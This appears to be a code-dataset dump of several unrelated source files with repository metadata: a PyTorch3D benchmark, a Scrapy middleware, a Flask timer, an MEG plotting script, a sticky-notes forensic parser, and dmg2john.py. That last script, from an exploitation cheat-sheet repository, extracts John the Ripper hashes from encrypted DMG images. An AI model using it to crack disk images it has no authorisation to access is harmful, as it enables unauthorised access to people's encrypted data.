devices.append(CUDA_DEVICE)
kwargs_list = []
func_names = FUNC_NAME_TO_FUNC.keys()
batch_sizes = [16, 128, 1024, 8192, 65536, 1048576]
for func_name, batch_size, device in product(func_names, batch_sizes, devices):
# Run CUDA-only implementations only on GPU
if "cuda" in func_name and not device.startswith("cuda"):
continue
# Torch built-ins are quite slow on larger batches
if "torch" in func_name and batch_size > 8192:
continue
# Avoid running CPU implementations on larger batches as well
if device == "cpu" and batch_size > 8192:
continue
kwargs_list.append(
{"func_name": func_name, "batch_size": batch_size, "device": device}
)
benchmark(
test_symeig3x3,
"SYMEIG3X3",
kwargs_list,
warmup_iters=3,
)
if __name__ == "__main__":
bm_symeig3x3() | en | 0.916975 | # Copyright (c) Meta Platforms, Inc. and affiliates. # All rights reserved. # # This source code is licensed under the BSD-style license found in the # LICENSE file in the root directory of this source tree. # Run CUDA-only implementations only on GPU # Torch built-ins are quite slow on larger batches # Avoid running CPU implementations on larger batches as well | 1.758614 | 2 |
Z - Tool Box/x2john/dmg2john.py | dfirpaul/Active-Directory-Exploitation-Cheat-Sheet-1 | 2,109 | 6632480 | <filename>Z - Tool Box/x2john/dmg2john.py
#!/usr/bin/env python
# Written by <NAME> <dhiru at openwall.com> in March, 2013
# My code is under "Simplified BSD License"
import sys
import os
import struct
from binascii import hexlify
# header structs are taken from vilefault and hashkill projects
v1_header_fmt = '> 48s I I 48s 32s I 296s I 300s I 48s 484s'
v1_header_size = struct.calcsize(v1_header_fmt)
# v2_header_fmt = '> 8s I I I I I I I 16s I Q Q 24s I I I I 32s I 32s I I I I I 48s'
# encrypted_blob_size can be 64, handle such cases properly too, a value of 48
# is already handled well
v2_header_fmt = '> 8s I I I I I I I 16s I Q Q 24s I I I I 32s I 32s I I I I I 64s'
v2_header_size = struct.calcsize(v2_header_fmt)
PY3 = sys.version_info[0] == 3
PMV = sys.version_info[1] >= 6
if PY3 or PMV:
exec('MAGICv1=b"cdsaencr"')
exec('MAGICv2=b"encrcdsa"')
else:
MAGICv1 = "cdsaencr"
MAGICv2 = "encrcdsa"
def process_file(filename):
cno = 0
data_size = 0
headerver = 0
try:
fd = open(filename, "rb")
except IOError:
e = sys.exc_info()[1]
sys.stderr.write("%s\n" % str(e))
return
buf8 = fd.read(8)
if len(buf8) != 8:
sys.stderr.write("%s is not a DMG file!\n" % filename)
return
if buf8 == MAGICv2:
headerver = 2
else:
fd.seek(-8, 2)
buf8 = fd.read(8)
if len(buf8) != 8:
sys.stderr.write("%s is not a DMG file!\n" % filename)
return
if buf8 == MAGICv1:
headerver = 1
if headerver == 0:
sys.stderr.write("%s is not an encrypted DMG file!\n" % filename)
return
sys.stderr.write("Header version %d detected\n" % headerver)
if headerver == 1:
fd.seek(- v1_header_size, 2)
data = fd.read(v1_header_size)
if len(data) != v1_header_size:
sys.stderr.write("%s is not a DMG file!\n" % filename)
return
data = struct.unpack(v1_header_fmt, data)
(_, kdf_iteration_count, kdf_salt_len, kdf_salt, _,
len_wrapped_aes_key, wrapped_aes_key, len_hmac_sha1_key,
wrapped_hmac_sha1_key, _, _, _) = data
sys.stdout.write("%s:$dmg$%d*%d*%s*%d*%s*%d*%s*%d::::%s\n" % \
(os.path.basename(filename), headerver, kdf_salt_len,
hexlify(kdf_salt)[0:kdf_salt_len * 2].decode("ascii"),
len_wrapped_aes_key,
hexlify(wrapped_aes_key)[0:len_wrapped_aes_key * 2].decode("ascii"),
len_hmac_sha1_key,
hexlify(wrapped_hmac_sha1_key)[0:len_hmac_sha1_key * 2].decode("ascii"),
kdf_iteration_count, filename))
else:
fd.seek(0, 0)
data = fd.read(v2_header_size)
if len(data) != v2_header_size:
sys.stderr.write("%s is not a DMG file!\n" % filename)
return
data = struct.unpack(v2_header_fmt, data)
(sig, version, enc_iv_size, _, _, _, _,
unk5, uuid, blocksize, datasize, dataoffset, filler1,
kdf_algorithm, kdf_prng_algorithm, kdf_iteration_count,
kdf_salt_len, kdf_salt, blob_enc_iv_size, blob_enc_iv,
blob_enc_key_bits, blob_enc_algorithm, blob_enc_padding,
blob_enc_mode, encrypted_keyblob_size, encrypted_keyblob) = data
fd.seek(dataoffset, 0)
cno = ((datasize + 4095) // 4096) - 2
data_size = datasize - cno * 4096
data_size = int(data_size)
if data_size < 0:
sys.stderr.write("%s is not a valid DMG file! \n" % filename)
return
if kdf_salt_len > 32:
sys.stderr.write("%s is not a valid DMG file. salt length " \
"is too long!\n" % filename)
return
# read starting chunk(s)
fd.seek(dataoffset + int(cno * 4096), 0)
chunk1 = fd.read(data_size)
if len(chunk1) != data_size:
sys.stderr.write("%s is not a DMG file!\n" % filename)
return
# read last chunk
fd.seek(dataoffset, 0)
chunk2 = fd.read(4096)
if len(chunk2) != 4096:
sys.stderr.write("%s is not a DMG file!\n" % filename)
return
# output hash
sys.stdout.write("%s:$dmg$%d*%d*%s*32*%s*%d*%s*%d*%d*%s*1*%s*%d::::%s\n" % \
(os.path.basename(filename), headerver,
kdf_salt_len,
hexlify(kdf_salt)[0:kdf_salt_len*2].decode("ascii"),
hexlify(blob_enc_iv)[0:64].decode("ascii"),
encrypted_keyblob_size,
hexlify(encrypted_keyblob)[0:encrypted_keyblob_size*2].decode("ascii") + \
"0" * (encrypted_keyblob_size * 2 - \
len(encrypted_keyblob) * 2),
cno, data_size, hexlify(chunk1).decode("ascii"),
hexlify(chunk2).decode("ascii"),
kdf_iteration_count, filename))
if __name__ == "__main__":
sys.stderr.write("Using 'dmg2john' instead of this program (%s) is recommended!\n\n" % sys.argv[0])
if len(sys.argv) < 2:
sys.stderr.write("Usage: %s [DMG files]\n" % sys.argv[0])
sys.exit(-1)
for i in range(1, len(sys.argv)):
process_file(sys.argv[i])
| <filename>Z - Tool Box/x2john/dmg2john.py
#!/usr/bin/env python
# Written by <NAME> <dhiru at openwall.com> in March, 2013
# My code is under "Simplified BSD License"
import sys
import os
import struct
from binascii import hexlify
# header structs are taken from vilefault and hashkill projects
v1_header_fmt = '> 48s I I 48s 32s I 296s I 300s I 48s 484s'
v1_header_size = struct.calcsize(v1_header_fmt)
# v2_header_fmt = '> 8s I I I I I I I 16s I Q Q 24s I I I I 32s I 32s I I I I I 48s'
# encrypted_blob_size can be 64, handle such cases properly too, a value of 48
# is already handled well
v2_header_fmt = '> 8s I I I I I I I 16s I Q Q 24s I I I I 32s I 32s I I I I I 64s'
v2_header_size = struct.calcsize(v2_header_fmt)
PY3 = sys.version_info[0] == 3
PMV = sys.version_info[1] >= 6
if PY3 or PMV:
exec('MAGICv1=b"cdsaencr"')
exec('MAGICv2=b"encrcdsa"')
else:
MAGICv1 = "cdsaencr"
MAGICv2 = "encrcdsa"
def process_file(filename):
cno = 0
data_size = 0
headerver = 0
try:
fd = open(filename, "rb")
except IOError:
e = sys.exc_info()[1]
sys.stderr.write("%s\n" % str(e))
return
buf8 = fd.read(8)
if len(buf8) != 8:
sys.stderr.write("%s is not a DMG file!\n" % filename)
return
if buf8 == MAGICv2:
headerver = 2
else:
fd.seek(-8, 2)
buf8 = fd.read(8)
if len(buf8) != 8:
sys.stderr.write("%s is not a DMG file!\n" % filename)
return
if buf8 == MAGICv1:
headerver = 1
if headerver == 0:
sys.stderr.write("%s is not an encrypted DMG file!\n" % filename)
return
sys.stderr.write("Header version %d detected\n" % headerver)
if headerver == 1:
fd.seek(- v1_header_size, 2)
data = fd.read(v1_header_size)
if len(data) != v1_header_size:
sys.stderr.write("%s is not a DMG file!\n" % filename)
return
data = struct.unpack(v1_header_fmt, data)
(_, kdf_iteration_count, kdf_salt_len, kdf_salt, _,
len_wrapped_aes_key, wrapped_aes_key, len_hmac_sha1_key,
wrapped_hmac_sha1_key, _, _, _) = data
sys.stdout.write("%s:$dmg$%d*%d*%s*%d*%s*%d*%s*%d::::%s\n" % \
(os.path.basename(filename), headerver, kdf_salt_len,
hexlify(kdf_salt)[0:kdf_salt_len * 2].decode("ascii"),
len_wrapped_aes_key,
hexlify(wrapped_aes_key)[0:len_wrapped_aes_key * 2].decode("ascii"),
len_hmac_sha1_key,
hexlify(wrapped_hmac_sha1_key)[0:len_hmac_sha1_key * 2].decode("ascii"),
kdf_iteration_count, filename))
else:
fd.seek(0, 0)
data = fd.read(v2_header_size)
if len(data) != v2_header_size:
sys.stderr.write("%s is not a DMG file!\n" % filename)
return
data = struct.unpack(v2_header_fmt, data)
(sig, version, enc_iv_size, _, _, _, _,
unk5, uuid, blocksize, datasize, dataoffset, filler1,
kdf_algorithm, kdf_prng_algorithm, kdf_iteration_count,
kdf_salt_len, kdf_salt, blob_enc_iv_size, blob_enc_iv,
blob_enc_key_bits, blob_enc_algorithm, blob_enc_padding,
blob_enc_mode, encrypted_keyblob_size, encrypted_keyblob) = data
fd.seek(dataoffset, 0)
cno = ((datasize + 4095) // 4096) - 2
data_size = datasize - cno * 4096
data_size = int(data_size)
if data_size < 0:
sys.stderr.write("%s is not a valid DMG file! \n" % filename)
return
if kdf_salt_len > 32:
sys.stderr.write("%s is not a valid DMG file. salt length " \
"is too long!\n" % filename)
return
# read starting chunk(s)
fd.seek(dataoffset + int(cno * 4096), 0)
chunk1 = fd.read(data_size)
if len(chunk1) != data_size:
sys.stderr.write("%s is not a DMG file!\n" % filename)
return
# read last chunk
fd.seek(dataoffset, 0)
chunk2 = fd.read(4096)
if len(chunk2) != 4096:
sys.stderr.write("%s is not a DMG file!\n" % filename)
return
# output hash
sys.stdout.write("%s:$dmg$%d*%d*%s*32*%s*%d*%s*%d*%d*%s*1*%s*%d::::%s\n" % \
(os.path.basename(filename), headerver,
kdf_salt_len,
hexlify(kdf_salt)[0:kdf_salt_len*2].decode("ascii"),
hexlify(blob_enc_iv)[0:64].decode("ascii"),
encrypted_keyblob_size,
hexlify(encrypted_keyblob)[0:encrypted_keyblob_size*2].decode("ascii") + \
"0" * (encrypted_keyblob_size * 2 - \
len(encrypted_keyblob) * 2),
cno, data_size, hexlify(chunk1).decode("ascii"),
hexlify(chunk2).decode("ascii"),
kdf_iteration_count, filename))
if __name__ == "__main__":
sys.stderr.write("Using 'dmg2john' instead of this program (%s) is recommended!\n\n" % sys.argv[0])
if len(sys.argv) < 2:
sys.stderr.write("Usage: %s [DMG files]\n" % sys.argv[0])
sys.exit(-1)
for i in range(1, len(sys.argv)):
process_file(sys.argv[i])
| en | 0.863184 | #!/usr/bin/env python # Written by <NAME> <dhiru at openwall.com> in March, 2013 # My code is under "Simplified BSD License" # header structs are taken from vilefault and hashkill projects # v2_header_fmt = '> 8s I I I I I I I 16s I Q Q 24s I I I I 32s I 32s I I I I I 48s' # encrypted_blob_size can be 64, handle such cases properly too, a value of 48 # is already handled well # read starting chunk(s) # read last chunk # output hash | 2.138239 | 2 |
scrapy_middlewares/req_middleware.py | CLannadZSY/scrapy-middlewares | 0 | 6632481 | import logging
logger = logging.getLogger('ModuleReqMiddleware.request')
class ReqMiddleware:
def __init__(self, settings, *args, **kwargs):
super(ReqMiddleware, self).__init__(*args, **kwargs)
self._settings = settings
self.logger = logger
@staticmethod
def transform_headers(headers):
new_headers = {
x.decode(): ','.join(map(lambda y: y.decode(), y))
for x, y in headers.items()
}
return new_headers
@classmethod
def from_crawler(cls, crawler):
settings = crawler.settings
return cls(settings)
| import logging
logger = logging.getLogger('ModuleReqMiddleware.request')
class ReqMiddleware:
def __init__(self, settings, *args, **kwargs):
super(ReqMiddleware, self).__init__(*args, **kwargs)
self._settings = settings
self.logger = logger
@staticmethod
def transform_headers(headers):
new_headers = {
x.decode(): ','.join(map(lambda y: y.decode(), y))
for x, y in headers.items()
}
return new_headers
@classmethod
def from_crawler(cls, crawler):
settings = crawler.settings
return cls(settings)
| none | 1 | 2.417673 | 2 |
|
app.py | daleattier/timer | 0 | 6632482 | <reponame>daleattier/timer<filename>app.py
# -*- coding: utf-8 -*-
"""
author: <NAME>
blog: withlihui.com
email: <EMAIL>
github: github.com/greyli
column: zhuanlan.zhihu.com/flask
---------------------------------
A simple timer made with Flask and JavaScript.
https://github.com/helloflask/timer
---------------------------------
MIT license.
"""
import re
from flask import Flask, render_template, url_for, redirect, request, flash
app = Flask(__name__)
app.config['SECRET_KEY'] = 'a very secret string'
@app.route('/')
def index():
return redirect(url_for('timer', num=21*60))
@app.route('/<int:num>s')
@app.route('/<int:num>')
def timer(num):
return render_template('index.html', num=num)
@app.route('/custom', methods=['GET', 'POST'])
def custom():
time = request.form.get('time', 180)
# use re to validate input data
m = re.match('\d+[smh]?$', time)
if m is None:
flash(u'PLease use the following format 34、20s、15m、2h')
return redirect(url_for('index'))
if time[-1] not in 'smh':
return redirect(url_for('timer', num=int(time)))
else:
type = {'s': 'timer', 'm': 'minutes', 'h': 'hours'}
return redirect(url_for(type[time[-1]], num=int(time[:-1])))
@app.route('/<int:num>m')
def minutes(num):
return redirect(url_for('timer', num=num*60))
@app.route('/<int:num>h')
def hours(num):
return redirect(url_for('timer', num=num*3600))
# todo pomodoro mode: loop a 25-5 minutes cycle
@app.route('/pomodoro')
def pomodoro():
return render_template('index.html')
@app.errorhandler(404)
def page_not_fouond(e):
flash(u'Sorry Can not find this file: )')
return redirect(url_for('timer', num=244))
| # -*- coding: utf-8 -*-
"""
author: <NAME>
blog: withlihui.com
email: <EMAIL>
github: github.com/greyli
column: zhuanlan.zhihu.com/flask
---------------------------------
A simple timer made with Flask and JavaScript.
https://github.com/helloflask/timer
---------------------------------
MIT license.
"""
import re
from flask import Flask, render_template, url_for, redirect, request, flash
app = Flask(__name__)
app.config['SECRET_KEY'] = 'a very secret string'
@app.route('/')
def index():
return redirect(url_for('timer', num=21*60))
@app.route('/<int:num>s')
@app.route('/<int:num>')
def timer(num):
return render_template('index.html', num=num)
@app.route('/custom', methods=['GET', 'POST'])
def custom():
time = request.form.get('time', 180)
# use re to validate input data
m = re.match('\d+[smh]?$', time)
if m is None:
flash(u'PLease use the following format 34、20s、15m、2h')
return redirect(url_for('index'))
if time[-1] not in 'smh':
return redirect(url_for('timer', num=int(time)))
else:
type = {'s': 'timer', 'm': 'minutes', 'h': 'hours'}
return redirect(url_for(type[time[-1]], num=int(time[:-1])))
@app.route('/<int:num>m')
def minutes(num):
return redirect(url_for('timer', num=num*60))
@app.route('/<int:num>h')
def hours(num):
return redirect(url_for('timer', num=num*3600))
# todo pomodoro mode: loop a 25-5 minutes cycle
@app.route('/pomodoro')
def pomodoro():
return render_template('index.html')
@app.errorhandler(404)
def page_not_fouond(e):
flash(u'Sorry Can not find this file: )')
return redirect(url_for('timer', num=244)) | en | 0.485094 | # -*- coding: utf-8 -*- author: <NAME> blog: withlihui.com email: <EMAIL> github: github.com/greyli column: zhuanlan.zhihu.com/flask --------------------------------- A simple timer made with Flask and JavaScript. https://github.com/helloflask/timer --------------------------------- MIT license. # use re to validate input data # todo pomodoro mode: loop a 25-5 minutes cycle | 3.15666 | 3 |
scripts/plot_stats_sensors.py | kingjr/decod_unseen_maintenance | 10 | 6632483 | # Author: <NAME> <<EMAIL>>
#
# Licence: BSD 3-clause
"""Plot the topographical effects obtained in each analysis.
Used to generate Figure 3.
"""
import numpy as np
import matplotlib.pyplot as plt
from jr.plot import plot_butterfly, plot_gfp, pretty_colorbar
from config import report, load
from conditions import analyses, tois
# Apply contrast on each type of epoch
for analysis in analyses:
# load stats
evoked, _, p_values, sig, _ = load(
'evoked', analysis=('stats_' + analysis['name']))
evoked.data -= analysis['chance'] # to avoid interpolation bug
evoked_full = evoked.copy() # used for tois
# Find significant cluster
sig = np.zeros_like(evoked.data)
sig[::3, :] = sig[1::3, :] = sig[2::3, :] = p_values < .05
sig_times = np.array(np.sum(sig, axis=0) > 0., dtype=int)
sig = sig[:, np.where((evoked.times >= -.100) & (evoked.times <= .600))[0]]
# Define color limit
toi = np.where((evoked_full.times >= tois[0][0]) &
(evoked_full.times <= tois[0][1]))[0]
vmin = np.percentile(np.mean(evoked_full.data[:, toi], axis=1), 99)
max_toi = 3
if 'target' in analysis['name']:
max_toi = 1
toi = np.where((evoked_full.times >= tois[max_toi][0]) &
(evoked_full.times <= tois[max_toi][1]))[0]
vmax = np.percentile(np.mean(evoked_full.data[:, toi], axis=1), 99)
vmin_mag = analysis['chance'] - vmax
if vmax - vmin < .005:
vmax += .005
# clim text
smin = '%.2f' % (vmin + analysis['chance'])
smin_mag = '%.2f' % (vmin_mag + analysis['chance'])
smax = '%.2f' % (vmax + analysis['chance'])
if vmax < 5e-3:
smin = '0' if vmin == 0 else '%.0e' % vmin
smax = '%.0e' % vmax
# Plot topo snapshots
evoked.crop(-.100, .600)
opts = dict(sensors=False, scale=1, contours=False, show=False,
times=np.linspace(0, .500, 6), average=.025, colorbar=True)
fig_grad = evoked.plot_topomap(cmap=analysis['cmap'], ch_type='grad',
vmin=vmin, vmax=vmax, **opts)
cax = fig_grad.get_children()[-1]
cax.set_yticks([vmin, vmax])
cax.set_yticklabels([smin, smax])
cax.set_title('')
report.add_figs_to_section(fig_grad, 'topo_grad', analysis['name'])
fig_mag = evoked.plot_topomap(ch_type='mag', vmin=vmin_mag, vmax=vmax,
**opts)
cax = fig_mag.get_children()[-1]
cax.set_yticks([vmin, vmax])
cax.set_yticklabels([smin_mag, '', smax])
cax.set_title('')
# fig_mag.tight_layout()
report.add_figs_to_section(fig_mag, 'topo_mag', analysis['name'])
# Plot butterfly
fig_butt_m, ax = plt.subplots(1, figsize=fig_grad.get_size_inches())
plot_butterfly(evoked, ax=ax, sig=sig, color=analysis['color'],
ch_type='mag')
# ax.axvline(800, color='k')
ax.set_xlim([-100, 600])
ax.set_xlabel('Times (ms)', labelpad=-15)
report.add_figs_to_section(fig_butt_m, 'butterfly_mag', analysis['name'])
# plot GFP
fig_butt_gfp, ax = plt.subplots(1, figsize=fig_grad.get_size_inches())
plot_gfp(evoked, ax=ax, sig=sig, color=analysis['color'])
ax.set_xlim([-100, 600])
ax.set_xlabel('Times (ms)', labelpad=-15)
report.add_figs_to_section(fig_butt_gfp, 'butterfly_gfp', analysis['name'])
# Plot topo of mean |effect| on TOI
evoked_full.data = np.abs(evoked_full.data)
fig, axes = plt.subplots(1, len(tois), figsize=[9, 2.5])
fig.subplots_adjust(wspace=0.01, left=0.)
for ax, toi in zip(axes, tois):
evoked_full.plot_topomap(times=[np.mean(toi)], average=np.ptp(toi),
cmap=analysis['cmap'], ch_type='grad',
show=False,
vmin=vmin, vmax=vmax, contours=False, scale=1,
colorbar=False, sensors=False, axes=ax)
from matplotlib.image import AxesImage
objects = axes[-2].get_children()
im = objects[np.where([isinstance(ii, AxesImage) for ii in objects])[0][0]]
pretty_colorbar(cax=fig.add_axes([.91, 0.15, .03, .6]),
im=im, ticklabels=[smin, '', smax])
report.add_figs_to_section(fig, 'topo_mean', analysis['name'])
report.save()
| # Author: <NAME> <<EMAIL>>
#
# Licence: BSD 3-clause
"""Plot the topographical effects obtained in each analysis.
Used to generate Figure 3.
"""
import numpy as np
import matplotlib.pyplot as plt
from jr.plot import plot_butterfly, plot_gfp, pretty_colorbar
from config import report, load
from conditions import analyses, tois
# Apply contrast on each type of epoch
for analysis in analyses:
# load stats
evoked, _, p_values, sig, _ = load(
'evoked', analysis=('stats_' + analysis['name']))
evoked.data -= analysis['chance'] # to avoid interpolation bug
evoked_full = evoked.copy() # used for tois
# Find significant cluster
sig = np.zeros_like(evoked.data)
sig[::3, :] = sig[1::3, :] = sig[2::3, :] = p_values < .05
sig_times = np.array(np.sum(sig, axis=0) > 0., dtype=int)
sig = sig[:, np.where((evoked.times >= -.100) & (evoked.times <= .600))[0]]
# Define color limit
toi = np.where((evoked_full.times >= tois[0][0]) &
(evoked_full.times <= tois[0][1]))[0]
vmin = np.percentile(np.mean(evoked_full.data[:, toi], axis=1), 99)
max_toi = 3
if 'target' in analysis['name']:
max_toi = 1
toi = np.where((evoked_full.times >= tois[max_toi][0]) &
(evoked_full.times <= tois[max_toi][1]))[0]
vmax = np.percentile(np.mean(evoked_full.data[:, toi], axis=1), 99)
vmin_mag = analysis['chance'] - vmax
if vmax - vmin < .005:
vmax += .005
# clim text
smin = '%.2f' % (vmin + analysis['chance'])
smin_mag = '%.2f' % (vmin_mag + analysis['chance'])
smax = '%.2f' % (vmax + analysis['chance'])
if vmax < 5e-3:
smin = '0' if vmin == 0 else '%.0e' % vmin
smax = '%.0e' % vmax
# Plot topo snapshots
evoked.crop(-.100, .600)
opts = dict(sensors=False, scale=1, contours=False, show=False,
times=np.linspace(0, .500, 6), average=.025, colorbar=True)
fig_grad = evoked.plot_topomap(cmap=analysis['cmap'], ch_type='grad',
vmin=vmin, vmax=vmax, **opts)
cax = fig_grad.get_children()[-1]
cax.set_yticks([vmin, vmax])
cax.set_yticklabels([smin, smax])
cax.set_title('')
report.add_figs_to_section(fig_grad, 'topo_grad', analysis['name'])
fig_mag = evoked.plot_topomap(ch_type='mag', vmin=vmin_mag, vmax=vmax,
**opts)
cax = fig_mag.get_children()[-1]
cax.set_yticks([vmin, vmax])
cax.set_yticklabels([smin_mag, '', smax])
cax.set_title('')
# fig_mag.tight_layout()
report.add_figs_to_section(fig_mag, 'topo_mag', analysis['name'])
# Plot butterfly
fig_butt_m, ax = plt.subplots(1, figsize=fig_grad.get_size_inches())
plot_butterfly(evoked, ax=ax, sig=sig, color=analysis['color'],
ch_type='mag')
# ax.axvline(800, color='k')
ax.set_xlim([-100, 600])
ax.set_xlabel('Times (ms)', labelpad=-15)
report.add_figs_to_section(fig_butt_m, 'butterfly_mag', analysis['name'])
# plot GFP
fig_butt_gfp, ax = plt.subplots(1, figsize=fig_grad.get_size_inches())
plot_gfp(evoked, ax=ax, sig=sig, color=analysis['color'])
ax.set_xlim([-100, 600])
ax.set_xlabel('Times (ms)', labelpad=-15)
report.add_figs_to_section(fig_butt_gfp, 'butterfly_gfp', analysis['name'])
# Plot topo of mean |effect| on TOI
evoked_full.data = np.abs(evoked_full.data)
fig, axes = plt.subplots(1, len(tois), figsize=[9, 2.5])
fig.subplots_adjust(wspace=0.01, left=0.)
for ax, toi in zip(axes, tois):
evoked_full.plot_topomap(times=[np.mean(toi)], average=np.ptp(toi),
cmap=analysis['cmap'], ch_type='grad',
show=False,
vmin=vmin, vmax=vmax, contours=False, scale=1,
colorbar=False, sensors=False, axes=ax)
from matplotlib.image import AxesImage
objects = axes[-2].get_children()
im = objects[np.where([isinstance(ii, AxesImage) for ii in objects])[0][0]]
pretty_colorbar(cax=fig.add_axes([.91, 0.15, .03, .6]),
im=im, ticklabels=[smin, '', smax])
report.add_figs_to_section(fig, 'topo_mean', analysis['name'])
report.save()
| en | 0.631646 | # Author: <NAME> <<EMAIL>> # # Licence: BSD 3-clause Plot the topographical effects obtained in each analysis. Used to generate Figure 3. # Apply contrast on each type of epoch # load stats # to avoid interpolation bug # used for tois # Find significant cluster # Define color limit # clim text # Plot topo snapshots # fig_mag.tight_layout() # Plot butterfly # ax.axvline(800, color='k') # plot GFP # Plot topo of mean |effect| on TOI | 2.370272 | 2 |
modules/sticky_note/lv1_stickynote.py | naaya17/carpe | 56 | 6632484 | <reponame>naaya17/carpe
# -*- coding:utf-8 -*-
import sqlite3
import datetime
import os
import pandas as pd
import olefile
import re
"""
testcase
1.[win7]_가상환경_StickyNotes.snt
"""
class Sticky_Note_Information:
par_id = ''
case_id = ''
evd_id = ''
note_id = ''
type = ''
content = ''
activated = ''
createdtime = ''
modifiedtime = ''
created_at_list = ["CreatedAt"]
updated_at_list = ["UpdatedAt"]
media_file_path_list = ["LocalFileRelativePath"]
media_mime_type_list = ["MimeType"]
media_id_list = ["Id"]
media_parent_id_list = ["ParentId"]
note_text_list = ["Text"]
note_is_open_list = ["IsOpen"]
note_id_list = ["Id"]
media_column_name_list = ["LocalFileRelativePath", "MimeType", "Id", "ParentId", "CreatedAt", "UpdatedAt"]
note_column_name_list = ["Text", "IsOpen", "Id", "CreatedAt", "UpdatedAt"]
our_db_column_name = ["Note_Id", "Type", "Content", "Activated", "CreatedTime", "ModifiedTime"]
def Parse2Type(data):
return data
def Parse2FilePath(data):
    removable_text = "ms-appdata:///local/media/"
    # Fall back to the original string if the expected prefix is not present
    result = data
    if removable_text in data:
        result = data.replace(removable_text, "")
    return result
def Parse2TimeStamp(data):
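    # The input is presumably a Windows/OLE-style tick count: 100-nanosecond units
    # counted from 0001-01-01. Dividing by 10,000,000 converts ticks to seconds and
    # subtracting 62,135,596,800 (the seconds between 0001-01-01 and 1970-01-01)
    # shifts the value onto the Unix epoch before it is formatted as ISO-8601.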
if data == 0:
return 0
return datetime.datetime.fromtimestamp(data / 10000000 - 62135596800).strftime('%Y-%m-%dT%H:%M:%S.%f')+'Z'
def Parse2Active(data):
if data == 1:
return "Open"
else:
return "Close"
def Parse2Id(data):
return data
def Parse2Text(data):
    # Regular expression for the note id: \id=[a-zA-Z0-9_]{8}-[a-zA-Z0-9_]{4}-[a-zA-Z0-9_]{4}-[a-zA-Z0-9_]{4}-[a-zA-Z0-9_]{12}
p = re.compile("\\\\id=[a-zA-Z0-9_]{8}-[a-zA-Z0-9_]{4}-[a-zA-Z0-9_]{4}-[a-zA-Z0-9_]{4}-[a-zA-Z0-9_]{12}")
data = re.sub(p, "", data)
return data
def saveDataInDict(our_db, output_column_name, data):
our_db[output_column_name] = data
def ParseColumn(temp_result_dictionary, data, column_name, sep):
if sep == "Media":
saveDataInDict(temp_result_dictionary, "Activated", "NULL")
if column_name in media_file_path_list:
saveDataInDict(temp_result_dictionary, "Content", Parse2FilePath(data))
elif column_name in media_mime_type_list:
saveDataInDict(temp_result_dictionary, "Type", Parse2Type(data))
# elif column_name in media_id_list:
# temp_result_dictionary["Media_Id"] = Parse2Id(data)
elif column_name in media_parent_id_list:
            # Store the ParentId as Note_Id so that media (image) rows can be linked to their text notes in the results
saveDataInDict(temp_result_dictionary, "Note_Id", Parse2Id(data))
elif column_name in created_at_list:
saveDataInDict(temp_result_dictionary, "CreatedTime", Parse2TimeStamp(data))
elif column_name in updated_at_list:
saveDataInDict(temp_result_dictionary, "ModifiedTime", Parse2TimeStamp(data))
elif sep == "Note":
saveDataInDict(temp_result_dictionary, "Type", "Text")
if column_name in note_text_list:
saveDataInDict(temp_result_dictionary, "Content", Parse2Text(data))
elif column_name in note_is_open_list:
saveDataInDict(temp_result_dictionary, "Activated", Parse2Active(data))
elif column_name in note_id_list:
saveDataInDict(temp_result_dictionary, "Note_Id", Parse2Id(data))
elif column_name in created_at_list:
saveDataInDict(temp_result_dictionary, "CreatedTime", Parse2TimeStamp(data))
elif column_name in updated_at_list:
saveDataInDict(temp_result_dictionary, "ModifiedTime", Parse2TimeStamp(data))
def convertSntResult(id, dictionary):
our_db = dict()
saveDataInDict(our_db, "Type", "text")
saveDataInDict(our_db, "Activated", "NULL")
saveDataInDict(our_db, "Note_Id", id)
saveDataInDict(our_db, "CreatedTime", dictionary["created_time"])
saveDataInDict(our_db, "ModifiedTime", dictionary["modified_time"])
saveDataInDict(our_db, "Content", dictionary["content"])
result = convertDictionaryToList(our_db)
return result
def convertDictionaryToList(dict):
result = list()
for output_column_name in our_db_column_name:
result.append(dict[output_column_name])
return result
def divide2column(row, column_name_list, sep):
result_sql = dict()
for i in range(0, len(column_name_list)):
ParseColumn(result_sql, row[i], column_name_list[i], sep)
result = convertDictionaryToList(result_sql)
return result
def ParseSnt(file):
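    # A legacy StickyNotes.snt file is an OLE compound document. Based on the checks
    # below, each note is assumed to live in its own storage (a name containing three
    # '-' characters) whose stream "3" holds the note text as UTF-16; the storage's
    # creation and modification times are used as the note's timestamps.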
ole = olefile.OleFileIO(file)
result = dict()
for stream in ole.listdir():
if stream[0].count("-") == 3 and stream[1] == "3":
created_time = ole.getctime(stream[0])
modified_time = ole.getmtime(stream[0])
content = ole.openstream((stream)).read().decode("utf-16").rstrip("\u0000")
result[stream[0]] = dict()
result_stream = result[stream[0]]
result_stream["created_time"] = str(created_time)
result_stream["modified_time"] = str(modified_time)
result_stream["content"] = content
return result
def SaveDataInDict(our_db, output_column_name, data):
    our_db[output_column_name] = data
def STICKYNOTE(filename):
result = []
note_count = 0
'''
basepath = os.getcwd()
#filename = "[win10]_1809_가상환경_plum.sqlite"
target_file = basepath + "//" + filename
'''
target_file = filename
# olefile signature = 0x D0 CF 11 E0 A1 B1 1A E1
# sqlite signature = 0x 53 51 4C 69 74 65 20 66 6F 72 6D 61 74 20 33 00
if not olefile.isOleFile(target_file):
conn = sqlite3.connect(target_file)
cur = conn.cursor()
sql_command = "SELECT "
for column_name in note_column_name_list:
sql_command += column_name
if column_name is not note_column_name_list[-1]:
sql_command += ', '
sql_command += " FROM Note"
note_data = cur.execute(sql_command)
for row in note_data:
note_data_row = divide2column(row, note_column_name_list, "Note")
sticky_note_information = Sticky_Note_Information()
result.append(sticky_note_information)
result[note_count].note_id = note_data_row[0]
result[note_count].type = note_data_row[1]
result[note_count].content = note_data_row[2]
result[note_count].activated = note_data_row[3]
result[note_count].createdtime = note_data_row[4]
result[note_count].modifiedtime = note_data_row[5]
note_count = note_count + 1
sql_command = "SELECT "
for column_name in media_column_name_list:
sql_command += column_name
if column_name is not media_column_name_list[-1]:
sql_command += ', '
sql_command += " FROM Media"
media_data = cur.execute(sql_command)
for row in media_data:
media_data_row = divide2column(row, media_column_name_list, "Media")
sticky_note_information = Sticky_Note_Information()
result.append(sticky_note_information)
result[note_count].note_id = media_data_row[0]
result[note_count].type = media_data_row[1]
result[note_count].content = ''.join(media_data_row[2].split())
result[note_count].activated = media_data_row[3]
result[note_count].createdtime = media_data_row[4]
result[note_count].modifiedtime = media_data_row[5]
note_count = note_count + 1
elif olefile.isOleFile(target_file):
result_snt = ParseSnt(target_file)
for key, value in result_snt.items():
rs = convertSntResult(key, value)
result.append(rs)
return result
| # -*- coding:utf-8 -*-
import sqlite3
import datetime
import os
import pandas as pd
